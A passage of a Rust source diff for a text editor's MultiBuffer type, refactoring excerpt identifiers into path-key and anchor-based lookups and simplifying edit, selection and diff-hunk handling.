impl MultiBuffer { new_text: new_text.clone(), is_insertion: false, original_indent_column, - excerpt_id: region.excerpt.id, }); } cursor.next_excerpt(); } } } - (buffer_edits, edited_excerpt_ids) + buffer_edits } pub fn autoindent_ranges(&mut self, ranges: I, cx: &mut Context) @@ -1621,7 +1679,7 @@ impl MultiBuffer { edits: Vec<(Range, Arc)>, cx: &mut Context, ) { - let (buffer_edits, edited_excerpt_ids) 
= + let buffer_edits = MultiBuffer::convert_edits_to_buffer_edits(edits, this.snapshot.get_mut(), &[]); let mut buffer_ids = Vec::new(); @@ -1645,10 +1703,7 @@ impl MultiBuffer { }) } - cx.emit(Event::ExcerptsEdited { - excerpt_ids: edited_excerpt_ids, - buffer_ids, - }); + cx.emit(Event::BuffersEdited { buffer_ids }); } } @@ -1659,38 +1714,25 @@ impl MultiBuffer { cursor_shape: CursorShape, cx: &mut Context, ) { + let snapshot = self.snapshot(cx); let mut selections_by_buffer: HashMap>> = Default::default(); - let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::>(()); - for selection in selections { - let start_locator = snapshot.excerpt_locator_for_id(selection.start.excerpt_id); - let end_locator = snapshot.excerpt_locator_for_id(selection.end.excerpt_id); - cursor.seek(&Some(start_locator), Bias::Left); - while let Some(excerpt) = cursor.item() - && excerpt.locator <= *end_locator + for selection in selections { + for (buffer_snapshot, buffer_range, _) in + snapshot.range_to_buffer_ranges(selection.start..selection.end) { - let mut start = excerpt.range.context.start; - let mut end = excerpt.range.context.end; - if excerpt.id == selection.start.excerpt_id { - start = selection.start.text_anchor; - } - if excerpt.id == selection.end.excerpt_id { - end = selection.end.text_anchor; - } selections_by_buffer - .entry(excerpt.buffer_id) + .entry(buffer_snapshot.remote_id()) .or_default() .push(Selection { id: selection.id, - start, - end, + start: buffer_snapshot + .anchor_at(buffer_range.start, selection.start.bias()), + end: buffer_snapshot.anchor_at(buffer_range.end, selection.end.bias()), reversed: selection.reversed, goal: selection.goal, }); - - cursor.next(); } } @@ -1702,25 +1744,9 @@ impl MultiBuffer { } } - for (buffer_id, mut selections) in selections_by_buffer { + for (buffer_id, selections) in selections_by_buffer { self.buffers[&buffer_id].buffer.update(cx, |buffer, cx| { - selections.sort_unstable_by(|a, b| a.start.cmp(&b.start, 
buffer)); - let mut selections = selections.into_iter().peekable(); - let merged_selections = Arc::from_iter(iter::from_fn(|| { - let mut selection = selections.next()?; - while let Some(next_selection) = selections.peek() { - if selection.end.cmp(&next_selection.start, buffer).is_ge() { - let next_selection = selections.next().unwrap(); - if next_selection.end.cmp(&selection.end, buffer).is_ge() { - selection.end = next_selection.end; - } - } else { - break; - } - } - Some(selection) - })); - buffer.set_active_selections(merged_selections, line_mode, cursor_shape, cx); + buffer.set_active_selections(selections.into(), line_mode, cursor_shape, cx); }); } } @@ -1736,199 +1762,31 @@ impl MultiBuffer { #[instrument(skip_all)] fn merge_excerpt_ranges<'a>( expanded_ranges: impl IntoIterator> + 'a, - ) -> (Vec>, Vec) { + ) -> Vec> { + let mut sorted: Vec<_> = expanded_ranges.into_iter().collect(); + sorted.sort_by_key(|range| range.context.start); let mut merged_ranges: Vec> = Vec::new(); - let mut counts: Vec = Vec::new(); - for range in expanded_ranges { + for range in sorted { if let Some(last_range) = merged_ranges.last_mut() { - assert!( - last_range.context.start <= range.context.start, - "ranges must be sorted: {last_range:?} <= {range:?}" - ); if last_range.context.end >= range.context.start || last_range.context.end.row + 1 == range.context.start.row { last_range.context.end = range.context.end.max(last_range.context.end); - *counts.last_mut().unwrap() += 1; continue; } } merged_ranges.push(range.clone()); - counts.push(1); - } - (merged_ranges, counts) - } - - pub fn insert_excerpts_after( - &mut self, - prev_excerpt_id: ExcerptId, - buffer: Entity, - ranges: impl IntoIterator>, - cx: &mut Context, - ) -> Vec - where - O: text::ToOffset, - { - let mut ids = Vec::new(); - let mut next_excerpt_id = - if let Some(last_entry) = self.snapshot.borrow().excerpt_ids.last() { - last_entry.id.0 + 1 - } else { - 1 - }; - self.insert_excerpts_with_ids_after( - 
prev_excerpt_id, - buffer, - ranges.into_iter().map(|range| { - let id = ExcerptId(post_inc(&mut next_excerpt_id)); - ids.push(id); - (id, range) - }), - cx, - ); - ids - } - - pub fn insert_excerpts_with_ids_after( - &mut self, - prev_excerpt_id: ExcerptId, - buffer: Entity, - ranges: impl IntoIterator)>, - cx: &mut Context, - ) where - O: text::ToOffset, - { - assert_eq!(self.history.transaction_depth(), 0); - let mut ranges = ranges.into_iter().peekable(); - if ranges.peek().is_none() { - return Default::default(); - } - - self.sync_mut(cx); - - let buffer_snapshot = buffer.read(cx).snapshot(); - let buffer_id = buffer_snapshot.remote_id(); - - let buffer_state = self.buffers.entry(buffer_id).or_insert_with(|| { - self.buffer_changed_since_sync.replace(true); - buffer.update(cx, |buffer, _| { - buffer.record_changes(Rc::downgrade(&self.buffer_changed_since_sync)); - }); - BufferState { - last_version: RefCell::new(buffer_snapshot.version().clone()), - last_non_text_state_update_count: Cell::new( - buffer_snapshot.non_text_state_update_count(), - ), - excerpts: Default::default(), - _subscriptions: [ - cx.observe(&buffer, |_, _, cx| cx.notify()), - cx.subscribe(&buffer, Self::on_buffer_event), - ], - buffer: buffer.clone(), - } - }); - - let mut snapshot = self.snapshot.get_mut(); - - let mut prev_locator = snapshot.excerpt_locator_for_id(prev_excerpt_id).clone(); - let mut new_excerpt_ids = mem::take(&mut snapshot.excerpt_ids); - let mut cursor = snapshot.excerpts.cursor::>(()); - let mut new_excerpts = cursor.slice(&prev_locator, Bias::Right); - prev_locator = cursor.start().unwrap_or(Locator::min_ref()).clone(); - - let edit_start = ExcerptDimension(new_excerpts.summary().text.len); - new_excerpts.update_last( - |excerpt| { - excerpt.has_trailing_newline = true; - }, - (), - ); - - let next_locator = if let Some(excerpt) = cursor.item() { - excerpt.locator.clone() - } else { - Locator::max() - }; - - let mut excerpts = Vec::new(); - let buffer_snapshot = 
Arc::new(buffer_snapshot); - while let Some((id, range)) = ranges.next() { - let locator = Locator::between(&prev_locator, &next_locator); - if let Err(ix) = buffer_state.excerpts.binary_search(&locator) { - buffer_state.excerpts.insert(ix, locator.clone()); - } - let range = ExcerptRange { - context: buffer_snapshot.anchor_before(&range.context.start) - ..buffer_snapshot.anchor_after(&range.context.end), - primary: buffer_snapshot.anchor_before(&range.primary.start) - ..buffer_snapshot.anchor_after(&range.primary.end), - }; - excerpts.push((id, range.clone())); - let excerpt = Excerpt::new( - id, - locator.clone(), - buffer_id, - buffer_snapshot.clone(), - range, - ranges.peek().is_some() || cursor.item().is_some(), - ); - new_excerpts.push(excerpt, ()); - prev_locator = locator.clone(); - - if let Some(last_mapping_entry) = new_excerpt_ids.last() { - assert!(id > last_mapping_entry.id, "excerpt ids must be increasing"); - } - new_excerpt_ids.push(ExcerptIdMapping { id, locator }, ()); - } - snapshot - .buffer_locators - .insert(buffer_id, buffer_state.excerpts.iter().cloned().collect()); - - let edit_end = ExcerptDimension(new_excerpts.summary().text.len); - - let suffix = cursor.suffix(); - let changed_trailing_excerpt = suffix.is_empty(); - new_excerpts.append(suffix, ()); - drop(cursor); - snapshot.excerpts = new_excerpts; - snapshot.excerpt_ids = new_excerpt_ids; - if changed_trailing_excerpt { - snapshot.trailing_excerpt_update_count += 1; - } - - let edits = Self::sync_diff_transforms( - &mut snapshot, - vec![Edit { - old: edit_start..edit_start, - new: edit_start..edit_end, - }], - DiffChangeKind::BufferEdited, - ); - if !edits.is_empty() { - self.subscriptions.publish(edits); } - - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsAdded { - buffer, - predecessor: prev_excerpt_id, - excerpts, - }); - cx.notify(); + merged_ranges } pub fn clear(&mut self, cx: &mut Context) { self.sync_mut(cx); - let ids = self.excerpt_ids(); let 
removed_buffer_ids = std::mem::take(&mut self.buffers).into_keys().collect(); - self.excerpts_by_path.clear(); - self.paths_by_excerpt.clear(); + self.diffs.clear(); let MultiBufferSnapshot { excerpts, - buffer_locators, - diffs: _, + diffs, diff_transforms: _, non_text_state_update_count: _, edit_count: _, @@ -1937,27 +1795,25 @@ impl MultiBuffer { has_conflict, has_inverted_diff, singleton: _, - excerpt_ids: _, - replaced_excerpts, trailing_excerpt_update_count, all_diff_hunks_expanded: _, show_deleted_hunks: _, use_extended_diff_range: _, show_headers: _, + path_keys_by_index: _, + indices_by_path_key: _, + buffers, } = self.snapshot.get_mut(); - buffer_locators.clear(); let start = ExcerptDimension(MultiBufferOffset::ZERO); let prev_len = ExcerptDimension(excerpts.summary().text.len); *excerpts = Default::default(); + *buffers = Default::default(); + *diffs = Default::default(); *trailing_excerpt_update_count += 1; *is_dirty = false; *has_deleted_file = false; *has_conflict = false; *has_inverted_diff = false; - match Arc::get_mut(replaced_excerpts) { - Some(replaced_excerpts) => replaced_excerpts.clear(), - None => *replaced_excerpts = Default::default(), - } let edits = Self::sync_diff_transforms( self.snapshot.get_mut(), @@ -1972,121 +1828,12 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); - cx.emit(Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - }); + cx.emit(Event::BuffersRemoved { removed_buffer_ids }); cx.notify(); } - #[ztracing::instrument(skip_all)] - pub fn excerpts_for_buffer( - &self, - buffer_id: BufferId, - cx: &App, - ) -> Vec<(ExcerptId, ExcerptRange)> { - let mut excerpts = Vec::new(); - let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::>(()); - if let Some(locators) = snapshot.buffer_locators.get(&buffer_id) { - for locator in &**locators { - cursor.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *locator - { - 
excerpts.push((excerpt.id, excerpt.range.clone())); - } - } - } - - excerpts - } - - pub fn excerpt_ranges_for_buffer(&self, buffer_id: BufferId, cx: &App) -> Vec> { - let snapshot = self.read(cx); - let mut excerpts = snapshot - .excerpts - .cursor::, ExcerptPoint>>(()); - let mut diff_transforms = snapshot - .diff_transforms - .cursor::>>(()); - diff_transforms.next(); - let locators = snapshot - .buffer_locators - .get(&buffer_id) - .into_iter() - .flat_map(|v| &**v); - let mut result = Vec::new(); - for locator in locators { - excerpts.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = excerpts.item() - && excerpt.locator == *locator - { - let excerpt_start = excerpts.start().1; - let excerpt_end = excerpt_start + excerpt.text_summary.lines; - - diff_transforms.seek_forward(&excerpt_start, Bias::Left); - let overshoot = excerpt_start - diff_transforms.start().0; - let start = diff_transforms.start().1 + overshoot; - - diff_transforms.seek_forward(&excerpt_end, Bias::Right); - let overshoot = excerpt_end - diff_transforms.start().0; - let end = diff_transforms.start().1 + overshoot; - - result.push(start.0..end.0) - } - } - result - } - - pub fn excerpt_buffer_ids(&self) -> Vec { - self.snapshot - .borrow() - .excerpts - .iter() - .map(|entry| entry.buffer_id) - .collect() - } - - pub fn excerpt_ids(&self) -> Vec { - let snapshot = self.snapshot.borrow(); - let mut ids = Vec::with_capacity(snapshot.excerpts.summary().count); - ids.extend(snapshot.excerpts.iter().map(|entry| entry.id)); - ids - } - - pub fn excerpt_containing( - &self, - position: impl ToOffset, - cx: &App, - ) -> Option<(ExcerptId, Entity, Range)> { - let snapshot = self.read(cx); - let offset = position.to_offset(&snapshot); - - let mut cursor = snapshot.cursor::(); - cursor.seek(&offset); - cursor - .excerpt() - .or_else(|| snapshot.excerpts.last()) - .map(|excerpt| { - ( - excerpt.id, - self.buffers.get(&excerpt.buffer_id).unwrap().buffer.clone(), - 
excerpt.range.context.clone(), - ) - }) - } - - pub fn buffer_for_anchor(&self, anchor: Anchor, cx: &App) -> Option> { - if let Some(buffer_id) = anchor.text_anchor.buffer_id { - self.buffer(buffer_id) - } else { - let (_, buffer, _) = self.excerpt_containing(anchor, cx)?; - Some(buffer) - } - } - // If point is at the end of the buffer, the last excerpt is returned pub fn point_to_buffer_offset( &self, @@ -2106,15 +1853,10 @@ impl MultiBuffer { &self, point: T, cx: &App, - ) -> Option<(Entity, Point, ExcerptId)> { + ) -> Option<(Entity, Point)> { let snapshot = self.read(cx); - let (buffer, point, is_main_buffer) = - snapshot.point_to_buffer_point(point.to_point(&snapshot))?; - Some(( - self.buffers.get(&buffer.remote_id())?.buffer.clone(), - point, - is_main_buffer, - )) + let (buffer, point) = snapshot.point_to_buffer_point(point.to_point(&snapshot))?; + Some((self.buffers.get(&buffer.remote_id())?.buffer.clone(), point)) } pub fn buffer_point_to_anchor( @@ -2125,218 +1867,35 @@ impl MultiBuffer { cx: &App, ) -> Option { let mut found = None; - let snapshot = buffer.read(cx).snapshot(); - for (excerpt_id, range) in self.excerpts_for_buffer(snapshot.remote_id(), cx) { - let start = range.context.start.to_point(&snapshot); - let end = range.context.end.to_point(&snapshot); - if start <= point && point < end { - found = Some((snapshot.clip_point(point, Bias::Left), excerpt_id)); + let buffer_snapshot = buffer.read(cx).snapshot(); + let text_anchor = buffer_snapshot.anchor_after(&point); + let snapshot = self.snapshot(cx); + let path_key_index = snapshot.path_key_index_for_buffer(buffer_snapshot.remote_id())?; + for excerpt in snapshot.excerpts_for_buffer(buffer_snapshot.remote_id()) { + if excerpt + .context + .start + .cmp(&text_anchor, &buffer_snapshot) + .is_gt() + { + found = Some(Anchor::in_buffer(path_key_index, excerpt.context.start)); + break; + } else if excerpt + .context + .end + .cmp(&text_anchor, &buffer_snapshot) + .is_ge() + { + found = 
Some(Anchor::in_buffer(path_key_index, text_anchor)); break; } - if point < start { - found = Some((start, excerpt_id)); - } - if point > end { - found = Some((end, excerpt_id)); - } + found = Some(Anchor::in_buffer(path_key_index, excerpt.context.end)); } - found.map(|(point, excerpt_id)| { - let text_anchor = snapshot.anchor_after(point); - Anchor::in_buffer(excerpt_id, text_anchor) - }) + found } - pub fn buffer_anchor_to_anchor( - &self, - // todo(lw): We shouldn't need this? - buffer: &Entity, - anchor: text::Anchor, - cx: &App, - ) -> Option { - let snapshot = buffer.read(cx).snapshot(); - for (excerpt_id, range) in self.excerpts_for_buffer(snapshot.remote_id(), cx) { - if range.context.start.cmp(&anchor, &snapshot).is_le() - && range.context.end.cmp(&anchor, &snapshot).is_ge() - { - return Some(Anchor::in_buffer(excerpt_id, anchor)); - } - } - - None - } - - pub fn merge_excerpts( - &mut self, - excerpt_ids: &[ExcerptId], - cx: &mut Context, - ) -> ExcerptId { - debug_assert!(!excerpt_ids.is_empty()); - if excerpt_ids.len() == 1 { - return excerpt_ids[0]; - } - - let snapshot = self.snapshot(cx); - - let first_range = snapshot - .context_range_for_excerpt(excerpt_ids[0]) - .expect("first excerpt must exist"); - let last_range = snapshot - .context_range_for_excerpt(*excerpt_ids.last().unwrap()) - .expect("last excerpt must exist"); - - let union_range = first_range.start..last_range.end; - - drop(snapshot); - - self.resize_excerpt(excerpt_ids[0], union_range, cx); - let removed = &excerpt_ids[1..]; - for &excerpt_id in removed { - if let Some(path) = self.paths_by_excerpt.get(&excerpt_id) { - if let Some(excerpt_list) = self.excerpts_by_path.get_mut(path) { - excerpt_list.retain(|id| *id != excerpt_id); - if excerpt_list.is_empty() { - let path = path.clone(); - self.excerpts_by_path.remove(&path); - } - } - } - } - self.remove_excerpts(removed.iter().copied(), cx); - - excerpt_ids[0] - } - - pub fn remove_excerpts( - &mut self, - excerpt_ids: impl 
IntoIterator, - cx: &mut Context, - ) { - self.sync_mut(cx); - let ids = excerpt_ids.into_iter().collect::>(); - if ids.is_empty() { - return; - } - self.buffer_changed_since_sync.replace(true); - - let mut snapshot = self.snapshot.get_mut(); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::new(); - let mut excerpt_ids = ids.iter().copied().peekable(); - let mut removed_buffer_ids = Vec::new(); - let mut removed_excerpts_for_buffers = HashSet::default(); - - while let Some(excerpt_id) = excerpt_ids.next() { - self.paths_by_excerpt.remove(&excerpt_id); - // Seek to the next excerpt to remove, preserving any preceding excerpts. - let locator = snapshot.excerpt_locator_for_id(excerpt_id); - new_excerpts.append(cursor.slice(&Some(locator), Bias::Left), ()); - - if let Some(mut excerpt) = cursor.item() { - if excerpt.id != excerpt_id { - continue; - } - let mut old_start = cursor.start().1; - - // Skip over the removed excerpt. - 'remove_excerpts: loop { - if let Some(buffer_state) = self.buffers.get_mut(&excerpt.buffer_id) { - removed_excerpts_for_buffers.insert(excerpt.buffer_id); - buffer_state.excerpts.retain(|l| l != &excerpt.locator); - if buffer_state.excerpts.is_empty() { - log::debug!( - "removing buffer and diff for buffer {}", - excerpt.buffer_id - ); - self.buffers.remove(&excerpt.buffer_id); - removed_buffer_ids.push(excerpt.buffer_id); - } - } - cursor.next(); - - // Skip over any subsequent excerpts that are also removed. - if let Some(&next_excerpt_id) = excerpt_ids.peek() { - let next_locator = snapshot.excerpt_locator_for_id(next_excerpt_id); - if let Some(next_excerpt) = cursor.item() - && next_excerpt.locator == *next_locator - { - excerpt_ids.next(); - excerpt = next_excerpt; - continue 'remove_excerpts; - } - } - - break; - } - - // When removing the last excerpt, remove the trailing newline from - // the previous excerpt. 
- if cursor.item().is_none() && old_start > MultiBufferOffset::ZERO { - old_start -= 1; - new_excerpts.update_last(|e| e.has_trailing_newline = false, ()); - } - - // Push an edit for the removal of this run of excerpts. - let old_end = cursor.start().1; - let new_start = ExcerptDimension(new_excerpts.summary().text.len); - edits.push(Edit { - old: old_start..old_end, - new: new_start..new_start, - }); - } - } - let suffix = cursor.suffix(); - let changed_trailing_excerpt = suffix.is_empty(); - new_excerpts.append(suffix, ()); - drop(cursor); - for buffer_id in removed_excerpts_for_buffers { - match self.buffers.get(&buffer_id) { - Some(buffer_state) => { - snapshot - .buffer_locators - .insert(buffer_id, buffer_state.excerpts.iter().cloned().collect()); - } - None => { - snapshot.buffer_locators.remove(&buffer_id); - } - } - } - snapshot.excerpts = new_excerpts; - for buffer_id in &removed_buffer_ids { - self.diffs.remove(buffer_id); - snapshot.diffs.remove(buffer_id); - } - - // Recalculate has_inverted_diff after removing diffs - if !removed_buffer_ids.is_empty() { - snapshot.has_inverted_diff = snapshot - .diffs - .iter() - .any(|(_, diff)| diff.main_buffer.is_some()); - } - - if changed_trailing_excerpt { - snapshot.trailing_excerpt_update_count += 1; - } - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsRemoved { - ids, - removed_buffer_ids, - }); - cx.notify(); - } - - pub fn wait_for_anchors<'a, Anchors: 'a + Iterator>( + pub fn wait_for_anchors<'a, Anchors: 'a + Iterator>( &self, anchors: Anchors, cx: &mut Context, @@ -2344,14 +1903,15 @@ impl MultiBuffer { let mut error = None; let mut futures = Vec::new(); for anchor in anchors { - if let Some(buffer_id) = anchor.text_anchor.buffer_id { - if let Some(buffer) = self.buffers.get(&buffer_id) { + if let 
Some(excerpt_anchor) = anchor.excerpt_anchor() { + if let Some(buffer) = self.buffers.get(&excerpt_anchor.text_anchor.buffer_id) { buffer.buffer.update(cx, |buffer, _| { - futures.push(buffer.wait_for_anchors([anchor.text_anchor])) + futures.push(buffer.wait_for_anchors([excerpt_anchor.text_anchor()])) }); } else { error = Some(anyhow!( - "buffer {buffer_id} is not part of this multi-buffer" + "buffer {:?} is not part of this multi-buffer", + excerpt_anchor.text_anchor.buffer_id )); break; } @@ -2372,15 +1932,15 @@ impl MultiBuffer { &self, position: T, cx: &App, - ) -> Option<(Entity, language::Anchor)> { + ) -> Option<(Entity, text::Anchor)> { let snapshot = self.read(cx); - let anchor = snapshot.anchor_before(position); + let anchor = snapshot.anchor_before(position).excerpt_anchor()?; let buffer = self .buffers - .get(&anchor.text_anchor.buffer_id?)? + .get(&anchor.text_anchor.buffer_id)? .buffer .clone(); - Some((buffer, anchor.text_anchor)) + Some((buffer, anchor.text_anchor())) } fn on_buffer_event( @@ -2392,8 +1952,9 @@ impl MultiBuffer { use language::BufferEvent; let buffer_id = buffer.read(cx).remote_id(); cx.emit(match event { - BufferEvent::Edited => Event::Edited { + &BufferEvent::Edited { is_local } => Event::Edited { edited_buffer: Some(buffer), + is_local, }, BufferEvent::DirtyChanged => Event::DirtyChanged, BufferEvent::Saved => Event::Saved, @@ -2416,10 +1977,11 @@ impl MultiBuffer { let diff = diff.read(cx); let buffer_id = diff.buffer_id; let diff = DiffStateSnapshot { + buffer_id, diff: diff.snapshot(cx), main_buffer: None, }; - self.snapshot.get_mut().diffs.insert(buffer_id, diff); + self.snapshot.get_mut().diffs.insert_or_replace(diff, ()); } fn inverted_buffer_diff_language_changed( @@ -2432,13 +1994,11 @@ impl MultiBuffer { let main_buffer_snapshot = main_buffer.read(cx).snapshot(); let diff = diff.read(cx); let diff = DiffStateSnapshot { + buffer_id: base_text_buffer_id, diff: diff.snapshot(cx), main_buffer: Some(main_buffer_snapshot), }; 
- self.snapshot - .get_mut() - .diffs - .insert(base_text_buffer_id, diff); + self.snapshot.get_mut().diffs.insert_or_replace(diff, ()); } fn buffer_diff_changed( @@ -2447,31 +2007,33 @@ impl MultiBuffer { range: Range, cx: &mut Context, ) { - self.sync_mut(cx); + let Some(buffer) = self.buffer(diff.read(cx).buffer_id) else { + return; + }; + let snapshot = self.sync_mut(cx); let diff = diff.read(cx); let buffer_id = diff.buffer_id; - let Some(buffer_state) = self.buffers.get(&buffer_id) else { + let Some(path) = snapshot.path_for_buffer(buffer_id).cloned() else { return; }; let new_diff = DiffStateSnapshot { + buffer_id, diff: diff.snapshot(cx), main_buffer: None, }; - let mut snapshot = self.snapshot.get_mut(); - let base_text_changed = snapshot - .diffs - .get(&buffer_id) + let snapshot = self.snapshot.get_mut(); + let base_text_changed = find_diff_state(&snapshot.diffs, buffer_id) .is_none_or(|old_diff| !new_diff.base_texts_definitely_eq(old_diff)); - snapshot.diffs.insert_or_replace(buffer_id, new_diff); + snapshot.diffs.insert_or_replace(new_diff, ()); - let buffer = buffer_state.buffer.read(cx); + let buffer = buffer.read(cx); let diff_change_range = range.to_offset(buffer); - let excerpt_edits = snapshot.excerpt_edits_for_diff_change(buffer_state, diff_change_range); + let excerpt_edits = snapshot.excerpt_edits_for_diff_change(&path, diff_change_range); let edits = Self::sync_diff_transforms( - &mut snapshot, + snapshot, excerpt_edits, DiffChangeKind::DiffUpdated { base_changed: base_text_changed, @@ -2482,6 +2044,7 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2492,31 +2055,30 @@ impl MultiBuffer { diff_change_range: Option>, cx: &mut Context, ) { - self.sync_mut(cx); + let snapshot = self.sync_mut(cx); let base_text_buffer_id = diff.read(cx).base_text_buffer().read(cx).remote_id(); - let Some(buffer_state) = self.buffers.get(&base_text_buffer_id) else { + let Some(path) = 
snapshot.path_for_buffer(base_text_buffer_id).cloned() else { return; }; let main_buffer_snapshot = main_buffer.read(cx).snapshot(); let diff = diff.read(cx); let new_diff = DiffStateSnapshot { + buffer_id: base_text_buffer_id, diff: diff.snapshot(cx), main_buffer: Some(main_buffer_snapshot), }; - let mut snapshot = self.snapshot.get_mut(); - snapshot - .diffs - .insert_or_replace(base_text_buffer_id, new_diff); + let snapshot = self.snapshot.get_mut(); + snapshot.diffs.insert_or_replace(new_diff, ()); let Some(diff_change_range) = diff_change_range else { return; }; - let excerpt_edits = snapshot.excerpt_edits_for_diff_change(buffer_state, diff_change_range); + let excerpt_edits = snapshot.excerpt_edits_for_diff_change(&path, diff_change_range); let edits = Self::sync_diff_transforms( - &mut snapshot, + snapshot, excerpt_edits, DiffChangeKind::DiffUpdated { // We don't read this field for inverted diffs. @@ -2528,6 +2090,7 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2539,14 +2102,6 @@ impl MultiBuffer { self.all_buffers_iter().collect() } - pub fn all_buffer_ids_iter(&self) -> impl Iterator { - self.buffers.keys().copied() - } - - pub fn all_buffer_ids(&self) -> Vec { - self.all_buffer_ids_iter().collect() - } - pub fn buffer(&self, buffer_id: BufferId) -> Option> { self.buffers .get(&buffer_id) @@ -2559,18 +2114,12 @@ impl MultiBuffer { } pub fn language_settings<'a>(&'a self, cx: &'a App) -> Cow<'a, LanguageSettings> { - let buffer_id = self - .snapshot - .borrow() + let snapshot = self.snapshot(cx); + snapshot .excerpts .first() - .map(|excerpt| excerpt.buffer.remote_id()); - buffer_id - .and_then(|buffer_id| self.buffer(buffer_id)) - .map(|buffer| { - let buffer = buffer.read(cx); - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) - }) + .and_then(|excerpt| self.buffer(excerpt.range.context.start.buffer_id)) + .map(|buffer| LanguageSettings::for_buffer(&buffer.read(cx), cx)) 
.unwrap_or_else(move || self.language_settings_at(MultiBufferOffset::default(), cx)) } @@ -2579,14 +2128,11 @@ impl MultiBuffer { point: T, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - let mut language = None; - let mut file = None; if let Some((buffer, offset)) = self.point_to_buffer_offset(point, cx) { - let buffer = buffer.read(cx); - language = buffer.language_at(offset); - file = buffer.file(); + LanguageSettings::for_buffer_at(buffer.read(cx), offset, cx) + } else { + Cow::Borrowed(&AllLanguageSettings::get_global(cx).defaults) } - language_settings(language.map(|l| l.name()), file, cx) } pub fn for_each_buffer(&self, f: &mut dyn FnMut(&Entity)) { @@ -2735,7 +2281,7 @@ impl MultiBuffer { pub fn set_all_diff_hunks_expanded(&mut self, cx: &mut Context) { self.snapshot.get_mut().all_diff_hunks_expanded = true; - self.expand_or_collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], true, cx); + self.expand_or_collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], true, cx); } pub fn all_diff_hunks_expanded(&self) -> bool { @@ -2744,7 +2290,7 @@ impl MultiBuffer { pub fn set_all_diff_hunks_collapsed(&mut self, cx: &mut Context) { self.snapshot.get_mut().all_diff_hunks_expanded = false; - self.expand_or_collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], false, cx); + self.expand_or_collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], false, cx); } pub fn set_show_deleted_hunks(&mut self, show: bool, cx: &mut Context) { @@ -2754,7 +2300,7 @@ impl MultiBuffer { let old_len = self.snapshot.borrow().len(); - let ranges = std::iter::once((Point::zero()..Point::MAX, ExcerptId::max())); + let ranges = std::iter::once((Point::zero()..Point::MAX, None)); let _ = self.expand_or_collapse_diff_hunks_inner(ranges, true, cx); let new_len = self.snapshot.borrow().len(); @@ -2767,6 +2313,7 @@ impl MultiBuffer { cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2776,7 +2323,7 @@ impl MultiBuffer { pub fn 
has_multiple_hunks(&self, cx: &App) -> bool { self.read(cx) - .diff_hunks_in_range(Anchor::min()..Anchor::max()) + .diff_hunks_in_range(Anchor::Min..Anchor::Max) .nth(1) .is_some() } @@ -2822,7 +2369,7 @@ impl MultiBuffer { pub fn expand_or_collapse_diff_hunks_inner( &mut self, - ranges: impl IntoIterator, ExcerptId)>, + ranges: impl IntoIterator, Option)>, expand: bool, cx: &mut Context, ) -> Vec> { @@ -2833,18 +2380,34 @@ impl MultiBuffer { let mut snapshot = self.snapshot.get_mut(); let mut excerpt_edits = Vec::new(); let mut last_hunk_row = None; - for (range, end_excerpt_id) in ranges { + for (range, end_anchor) in ranges { for diff_hunk in snapshot.diff_hunks_in_range(range) { - if diff_hunk.excerpt_id.cmp(&end_excerpt_id, &snapshot).is_gt() { + if let Some(end_anchor) = &end_anchor + && let Some(hunk_end_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.end) + && hunk_end_anchor.cmp(end_anchor, snapshot).is_gt() + { + continue; + } + let hunk_range = diff_hunk.multi_buffer_range; + if let Some(excerpt_start_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.start) + && hunk_range.start.to_point(snapshot) < excerpt_start_anchor.to_point(snapshot) + { continue; } if last_hunk_row.is_some_and(|row| row >= diff_hunk.row_range.start) { continue; } - let start = Anchor::in_buffer(diff_hunk.excerpt_id, diff_hunk.buffer_range.start); - let end = Anchor::in_buffer(diff_hunk.excerpt_id, diff_hunk.buffer_range.end); - let start = snapshot.excerpt_offset_for_anchor(&start); - let end = snapshot.excerpt_offset_for_anchor(&end); + let mut start = snapshot.excerpt_offset_for_anchor(&hunk_range.start); + let mut end = snapshot.excerpt_offset_for_anchor(&hunk_range.end); + if let Some(excerpt_end_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.end) + { + let excerpt_end = snapshot.excerpt_offset_for_anchor(&excerpt_end_anchor); + start = start.min(excerpt_end); + end = end.min(excerpt_end); + }; last_hunk_row = 
Some(diff_hunk.row_range.start); excerpt_edits.push(text::Edit { old: start..end, @@ -2867,15 +2430,18 @@ impl MultiBuffer { cx: &mut Context, ) { let snapshot = self.snapshot.borrow().clone(); - let ranges = ranges.iter().map(move |range| { - let end_excerpt_id = range.end.excerpt_id; - let range = range.to_point(&snapshot); - let mut peek_end = range.end; - if range.end.row < snapshot.max_row().0 { - peek_end = Point::new(range.end.row + 1, 0); - }; - (range.start..peek_end, end_excerpt_id) - }); + let ranges = + ranges.iter().map(move |range| { + let excerpt_end = snapshot.excerpt_containing(range.end..range.end).and_then( + |(_, excerpt_range)| snapshot.anchor_in_excerpt(excerpt_range.context.end), + ); + let range = range.to_point(&snapshot); + let mut peek_end = range.end; + if range.end.row < snapshot.max_row().0 { + peek_end = Point::new(range.end.row + 1, 0); + }; + (range.start..peek_end, excerpt_end) + }); let edits = 